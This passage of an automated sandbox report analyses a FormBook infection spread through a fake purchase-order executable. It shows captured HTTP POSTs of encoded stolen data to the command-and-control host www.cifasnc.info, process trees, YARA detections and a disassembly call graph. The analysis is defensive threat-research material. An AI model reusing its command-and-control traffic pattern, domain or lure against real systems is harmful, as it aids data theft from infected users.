                                                          Jan 16, 2025 09:26:35.237584114 CET1157INData Raw: 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 68 63
                                                          Data Ascii: 8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%
                                                          Jan 16, 2025 09:26:35.238478899 CET5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.550005188.114.96.3803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:37.201065063 CET760OUTPOST /8rr3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.cifasnc.info
                                                          Origin: http://www.cifasnc.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cifasnc.info/8rr3/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 39 61 54 32 51 38 6e 66 6d 73 36 4b 6b 4a 43 79 69 37 46 61 33 53 70 4c 72 44 42 57 72 70 65 53 76 77 66 6e 6c 71 41 4b 38 58 38 6d 58 2f 50 30 62 57 6e 63 2f 30 56 56 50 70 6f 43 78 4e 36 38 62 6e 41 6e 6f 77 66 70 69 41 38 58 63 31 47 57 6f 66 62 51 72 59 6c 4b 65 38 62 38 4b 4e 75 72 6f 71 65 79 72 50 56 71 4e 65 6d 5a 64 6a 36 39 7a 62 54 35 4d 59 6f 69 6a 68 72 65 77 34 34 37 61 36 4f 46 32 33 6f 46 7a 39 6c 31 68 66 4f 34 4d 38 31 5a 5a 74 46 77 6f 4f 48 66 48 6d 78 33 53 48 50 7a 37 31 47 55 72 6b 65 4f 7a 48 5a 30 57 56
                                                          Data Ascii: R4Stj2k=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn9aT2Q8nfms6KkJCyi7Fa3SpLrDBWrpeSvwfnlqAK8X8mX/P0bWnc/0VVPpoCxN68bnAnowfpiA8Xc1GWofbQrYlKe8b8KNuroqeyrPVqNemZdj69zbT5MYoijhrew447a6OF23oFz9l1hfO4M81ZZtFwoOHfHmx3SHPz71GUrkeOzHZ0WV
                                                          Jan 16, 2025 09:26:37.767164946 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:26:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-pingback: http://cifasnc.info/xmlrpc.php
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          last-modified: Thu, 16 Jan 2025 08:26:37 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          vary: Accept-Encoding,User-Agent
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5X2XF4qtA7oxMelL%2BA8PdxuK12d6KTXVymiAWlp9KayTNNIKFTKCQTKJN2Y%2B8WaVXbjjQdfrKWlcYqrqs23pry55dut8fRChm0lmO0d%2FRzaHYe0%2Fmw1M%2BjVb27jfWbeC5XxI"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb8c0f8c39c7c-IAD
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7210&min_rtt=7210&rtt_var=3605&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c
                                                          Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
                                                          Jan 16, 2025 09:26:37.767225981 CET1161INData Raw: e2 20 b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2
                                                          Data Ascii: H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.550006188.114.96.3803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:39.750276089 CET1777OUTPOST /8rr3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.cifasnc.info
                                                          Origin: http://www.cifasnc.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cifasnc.info/8rr3/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 67 75 31 2f 6f 44 74 34 2b 50 6f 46 41 78 63 52 37 2b 32 6d 56 5a 68 64 6c 53 7a 4a 73 6e 31 61 53 48 77 38 6e 34 4b 73 37 4b 6b 4a 42 79 69 2b 46 61 33 44 70 50 2f 48 42 57 58 35 65 51 6e 77 46 45 74 71 49 62 38 58 32 6d 58 2f 44 55 62 58 34 4d 2f 68 56 56 2b 69 6f 43 68 4e 36 38 62 6e 41 6b 67 77 57 63 43 41 2b 58 63 30 42 57 6f 54 66 51 71 33 6c 4b 47 47 62 38 4f 37 75 59 67 71 64 57 33 50 46 50 5a 65 37 4a 64 68 71 74 7a 44 54 35 49 35 6f 69 76 6c 72 64 73 53 34 37 79 36 50 31 37 62 37 55 7a 68 37 56 46 6f 48 49 6c 46 33 4e 64 4b 45 78 73 6c 4e 2b 76 38 78 47 44 76 44 55 4b 77 54 33 4b 4b 63 59 48 56 58 30 2b 63 61 55 46 66 39 38 70 53 6b 47 58 48 32 6f 65 5a 77 55 39 72 4c 6b 2b 44 64 66 31 68 6b 4a 52 4e 6f 4b 68 54 5a 4a 53 66 72 49 69 73 55 4e 6b 6c 2f 4b 65 2f 6c 50 71 6c 61 46 39 78 4b 49 34 4c 63 36 49 7a 74 33 79 68 38 6b 51 35 7a 58 31 38 2b 53 30 61 67 56 55 43 56 4e 43 35 4b 42 66 41 36 75 51 2f 53 56 78 4e 6b 45 2f 61 53 39 [TRUNCATED]
                                                          Data Ascii: R4Stj2k=vLUBlmPRKk2bgu1/oDt4+PoFAxcR7+2mVZhdlSzJsn1aSHw8n4Ks7KkJByi+Fa3DpP/HBWX5eQnwFEtqIb8X2mX/DUbX4M/hVV+ioChN68bnAkgwWcCA+Xc0BWoTfQq3lKGGb8O7uYgqdW3PFPZe7JdhqtzDT5I5oivlrdsS47y6P17b7Uzh7VFoHIlF3NdKExslN+v8xGDvDUKwT3KKcYHVX0+caUFf98pSkGXH2oeZwU9rLk+Ddf1hkJRNoKhTZJSfrIisUNkl/Ke/lPqlaF9xKI4Lc6Izt3yh8kQ5zX18+S0agVUCVNC5KBfA6uQ/SVxNkE/aS9mwTovUv+11WvrCFU8tLxP8haU6zVGI48AE4HnOtcuZb5FcZM1EfPSVN8r4FLqxOaQ5XBp0k1BuwC1zkKllR6+w/Yqarc/teSGv8m/s6ymErYbpOnilnmExSP/jrIJqMmiaWvgGUMs9WeNcrKahFJlNJ1Ah9W34qxZmE54ePnp0L/ML1MkGJuTyRJMmuuNiF6MnM+v6oSvLJ5Ou16jyyfx8xYG7qDtkDk95uHmOw/qVuNqp2ZL4qgF5wBOV36wmWsvkg5bSTvMenMHIvImq9oFUeUSa29Zr2CCJg31hpbinrzl7WFqJNbNXsj6O55CeKVeRfXFeYKWUnjhOGWHzOlJwvmjtE6BwXMI6OzFoJtTw93WtdArlIqp5SfUpW9cVig5MAKMu4KXu8WJ36HQVsjRkGUpvSJTs6dLSQQl3m3N0jkdWvPtotVjbKCtTGrQbYlWN7rynttrFLEPinen6YeiqS5fP5HKHjis7f3sfLwS4ALpKHAWr/qZVnoUhzhjmKKro63Qft+bislGNRVRxs4okni1UvwefIY9qf/cJnLxspWvzysINTUnG8dCP73Nu/sx5yN4hzxZJy/tgXUQ4NZzstWvFCvu5P4YcXp99T1wIKgYg2zw2ZrlcBPAtSRqtS/nP3Yku4ACsTiZpV0w29JXKp+BwhynOA3f0 [TRUNCATED]
                                                          Jan 16, 2025 09:26:40.316966057 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:26:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-pingback: http://cifasnc.info/xmlrpc.php
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          last-modified: Thu, 16 Jan 2025 08:26:40 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          vary: Accept-Encoding,User-Agent
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ru8W4zVBt6ZgXdSWpV4VK9ml8vjiO1ctc7rH7xDNUlCK%2BMFxRYvE9TxbVDd6V2wYvxoitSssnk0Zi%2F6tEeemvKMHkWgmVVuDPTZV7CcuOZnHsuP9u4EwPIFkwbRMFYv5n%2Bg%2F"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb8d109aeab7c-YYZ
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=14180&min_rtt=14180&rtt_var=7090&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1777&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5
                                                          Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#
                                                          Jan 16, 2025 09:26:40.317038059 CET1167INData Raw: 4c e2 20 b4 48 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68
                                                          Data Ascii: L H8DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bm'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.550007188.114.96.3803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:42.289607048 CET484OUTGET /8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH4gP8KF2Qn8j/cmS57RgWwvqcfmQWCIyf50xkCSEufT28mA==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.cifasnc.info
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:26:42.842978954 CET1230INHTTP/1.1 301 Moved Permanently
                                                          Date: Thu, 16 Jan 2025 08:26:42 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-pingback: http://cifasnc.info/xmlrpc.php
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          last-modified: Thu, 16 Jan 2025 08:26:42 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          location: http://cifasnc.info/8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH4gP8KF2Qn8j/cmS57RgWwvqcfmQWCIyf50xkCSEufT28mA==&ml=PF-8nXUHD
                                                          vary: User-Agent
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jnOsFQu5eOfRbTaFe80WCrju%2BehcBF7KH0y1botxpSBkl7PxfLDHAaFpGaQz8L36u7DNDejYuHRXXVjaKuLWVOmiR5Od4AU2c5mw9yEZgftF6voheOBj8KUVgXj81T03fSH"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb8e0ca9b4301-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1556&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=55&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:03:23:43
                                                          Start date:16/01/2025
                                                          Path:C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe"
                                                          Imagebase:0xf10000
                                                          File size:289'280 bytes
                                                          MD5 hash:BD83674D593F0DBB40A73B74046E5E9C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:03:24:12
                                                          Start date:16/01/2025
                                                          Path:C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe"
                                                          Imagebase:0x3f0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:4
                                                          Start time:03:24:13
                                                          Start date:16/01/2025
                                                          Path:C:\Windows\SysWOW64\fc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                          Imagebase:0x850000
                                                          File size:22'528 bytes
                                                          MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:6
                                                          Start time:03:24:38
                                                          Start date:16/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff79f9e0000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:1.2%
                                                            Dynamic/Decrypted Code Coverage:5.2%
                                                            Signature Coverage:13.3%
                                                            Total number of Nodes:135
                                                            Total number of Limit Nodes:8
                                                            execution_graph 90507 f34e13 90508 f34e2f 90507->90508 90509 f34e57 90508->90509 90510 f34e6b 90508->90510 90511 f3cb43 NtClose 90509->90511 90517 f3cb43 90510->90517 90513 f34e60 90511->90513 90514 f34e74 90520 f3ed23 RtlAllocateHeap 90514->90520 90516 f34e7f 90518 f3cb60 90517->90518 90519 f3cb71 NtClose 90518->90519 90519->90514 90520->90516 90534 f351a3 90539 f351bc 90534->90539 90535 f3524c 90536 f35204 90542 f3ec03 90536->90542 90539->90535 90539->90536 90540 f35247 90539->90540 90541 f3ec03 RtlFreeHeap 90540->90541 90541->90535 90545 f3ceb3 90542->90545 90544 f35214 90546 f3cecd 90545->90546 90547 f3cede RtlFreeHeap 90546->90547 90547->90544 90548 f3fca3 90549 f3fcb3 90548->90549 90550 f3fcb9 90548->90550 90553 f3ece3 90550->90553 90552 f3fcdf 90556 f3ce63 90553->90556 90555 f3ecfe 90555->90552 90557 f3ce80 90556->90557 90558 f3ce91 RtlAllocateHeap 90557->90558 90558->90555 90559 f3c143 90560 f3c15d 90559->90560 90563 fd2df0 LdrInitializeThunk 90560->90563 90561 f3c185 90563->90561 90564 f3fd03 90565 f3ec03 RtlFreeHeap 90564->90565 90566 f3fd18 90565->90566 90521 f244f3 90522 f2450d 90521->90522 90527 f27ca3 90522->90527 90524 f2452b 90525 f2455f PostThreadMessageW 90524->90525 90526 f24570 90524->90526 90525->90526 90528 f27cc7 90527->90528 90529 f27d03 LdrLoadDll 90528->90529 90530 f27cce 90528->90530 90529->90530 90530->90524 90567 f2b7c3 90569 f2b807 90567->90569 90568 f2b828 90569->90568 90570 f3cb43 NtClose 90569->90570 90570->90568 90571 f2aa63 90572 f2aad5 90571->90572 90573 f2aa7b 90571->90573 90573->90572 90575 f2e993 90573->90575 90576 f2e9b9 90575->90576 90579 f2eab0 90576->90579 90581 f3fd43 RtlAllocateHeap RtlFreeHeap 90576->90581 90578 f2ea4e 90578->90579 90582 f3c193 90578->90582 90579->90572 90581->90578 90583 f3c1b0 90582->90583 90586 fd2c0a 90583->90586 90584 f3c1dc 90584->90579 90587 fd2c1f LdrInitializeThunk 90586->90587 90588 fd2c11 90586->90588 90587->90584 90588->90584 90531 f29258 90532 f3cb43 NtClose 90531->90532 90533 f29262 90532->90533 90589 f11beb 90590 f11bf9 90589->90590 90593 f40173 90590->90593 90596 f3e7b3 90593->90596 90597 f3e7d9 90596->90597 90608 f17583 90597->90608 90599 f3e7ef 90600 f11d8c 90599->90600 90611 f2b5d3 90599->90611 90602 f3e80e 90603 f3e823 90602->90603 90626 f3cf03 90602->90626 90622 f386d3 90603->90622 90606 f3e83d 90607 f3cf03 ExitProcess 90606->90607 90607->90600 90629 f26953 90608->90629 90610 f17590 90610->90599 90612 f2b5ff 90611->90612 90640 f2b4c3 90612->90640 90615 f2b644 90618 f2b660 90615->90618 90620 f3cb43 NtClose 90615->90620 90616 f2b62c 90617 f2b637 90616->90617 90619 f3cb43 NtClose 90616->90619 90617->90602 90618->90602 90619->90617 90621 f2b656 90620->90621 90621->90602 90623 f38735 90622->90623 90625 f38742 90623->90625 90651 f28b13 90623->90651 90625->90606 90627 f3cf1d 90626->90627 90628 f3cf2a ExitProcess 90627->90628 90628->90603 90630 f26970 90629->90630 90632 f26989 90630->90632 90633 f3d583 90630->90633 90632->90610 90635 f3d59d 90633->90635 90634 f3d5cc 90634->90632 90635->90634 90636 f3c193 LdrInitializeThunk 90635->90636 90637 f3d62c 90636->90637 90638 f3ec03 RtlFreeHeap 90637->90638 90639 f3d645 90638->90639 90639->90632 90641 f2b5b9 90640->90641 90642 f2b4dd 90640->90642 90641->90615 90641->90616 90646 f3c233 90642->90646 90645 f3cb43 NtClose 90645->90641 90647 f3c250 90646->90647 90650 fd35c0 LdrInitializeThunk 90647->90650 90648 f2b5ad 90648->90645 90650->90648 90652 f28b3d 90651->90652 90653 f2903b 90652->90653 90659 f24173 90652->90659 90653->90625 90655 f28c6a 90655->90653 90656 f3ec03 RtlFreeHeap 90655->90656 90657 f28c82 90656->90657 90657->90653 90658 f3cf03 ExitProcess 90657->90658 90658->90653 90663 f24193 90659->90663 90661 f241fc 90661->90655 90662 f241f2 90662->90655 90663->90661 90664 f2b8e3 RtlFreeHeap LdrInitializeThunk 90663->90664 90664->90662 90665 fd2b60 LdrInitializeThunk 90666 f2402f 90667 f23fa6 90666->90667 90667->90666 90668 f23fb5 90667->90668 90670 f3cdd3 90667->90670 90671 f3cdf0 90670->90671 90674 fd2c70 LdrInitializeThunk 90671->90674 90672 f3ce18 90672->90668 90674->90672

                                                            Executed Functions

                                                            Function 00F28B13 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 41 f28b13-f28b4a call f3eca3 44 f28b55-f28b87 call f3eca3 call f14b43 call f347b3 41->44 45 f28b50 call f3eca3 41->45 52 f29046-f2904a 44->52 53 f28b8d-f28bb7 call f3ec53 44->53 45->44 56 f28bc2 53->56 57 f28bb9-f28bc0 53->57 58 f28bc4-f28bce 56->58 57->58 59 f28bd0 58->59 60 f28bef-f28c01 call f347e3 58->60 61 f28bd3-f28bd6 59->61 67 f28c07-f28c1f call f3e603 60->67 68 f29044-f29045 60->68 63 f28bd8-f28bdb 61->63 64 f28bdf-f28be9 61->64 63->61 66 f28bdd 63->66 64->60 66->60 67->68 71 f28c25-f28c75 call f24173 67->71 68->52 71->68 74 f28c7b-f28c9b call f3ec03 71->74 77 f28ccc-f28cce 74->77 78 f28c9d-f28c9f 74->78 80 f28cd7-f28cf9 call f2b673 77->80 81 f28cd0 77->81 79 f28ca1-f28caf call f3e173 call f170c3 78->79 78->80 89 f28cb4-f28cb9 79->89 80->68 86 f28cff-f28d21 call f3c363 80->86 81->80 90 f28d26-f28d2b 86->90 89->77 91 f28cbb-f28cca 89->91 90->68 92 f28d31-f28da7 call f3bd03 call f3bdb3 call f3ec53 90->92 91->92 99 f28db0 92->99 100 f28da9-f28dae 92->100 101 f28db2-f28de2 99->101 100->101 102 f28de8-f28dee 101->102 103 f28ebe 101->103 105 f28df0-f28df3 102->105 106 f28dfc-f28e1d call f3ec53 102->106 104 f28ec0 103->104 109 f28ec7-f28ecb 104->109 105->102 108 f28df5-f28df7 105->108 113 f28e29 106->113 114 f28e1f-f28e27 106->114 108->104 111 f28ed1-f28ed5 109->111 112 f28ecd-f28ecf 109->112 111->109 112->111 115 f28ed7-f28eeb 112->115 116 f28e2c-f28e41 113->116 114->116 117 f28f55-f28fa8 call f27c23 * 2 call f3ec23 115->117 118 f28eed-f28ef2 115->118 119 f28e43 116->119 120 f28e54-f28e95 call f27ba3 call f3ec53 116->120 148 f28faa-f28fae 117->148 149 f28fcd-f28fd2 117->149 122 f28ef4-f28ef7 118->122 123 f28e46-f28e49 119->123 143 f28e97-f28e9c 120->143 144 f28e9e 120->144 126 f28ef9-f28efc 122->126 127 f28f0e-f28f10 122->127 129 f28e52 123->129 130 f28e4b-f28e4e 123->130 126->127 133 f28efe-f28f00 126->133 127->122 128 f28f12-f28f14 127->128 128->117 134 f28f16-f28f1e 128->134 129->120 130->123 135 f28e50 130->135 133->127 138 f28f02-f28f05 133->138 139 f28f23-f28f26 134->139 135->120 138->127 142 f28f07 138->142 145 f28f28-f28f2b 139->145 146 f28f4f-f28f53 139->146 142->127 150 f28ea0-f28ebc call f250a3 143->150 144->150 145->146 151 f28f2d-f28f2f 145->151 146->117 146->139 152 f28fb0-f28fc1 call f17133 148->152 153 f28fda-f28fec call f3bf13 148->153 149->153 155 f28fd4 149->155 150->104 151->146 156 f28f31-f28f34 151->156 161 f28fc6-f28fcb 152->161 163 f28ff3-f29008 call f2b843 153->163 155->153 156->146 160 f28f36-f28f4c 156->160 160->146 161->149 161->163 166 f2900a-f29036 call f27ba3 * 2 call f3cf03 163->166 172 f2903b-f2903e 166->172 172->68
                                                            Strings
                                                            Memory Dump Source
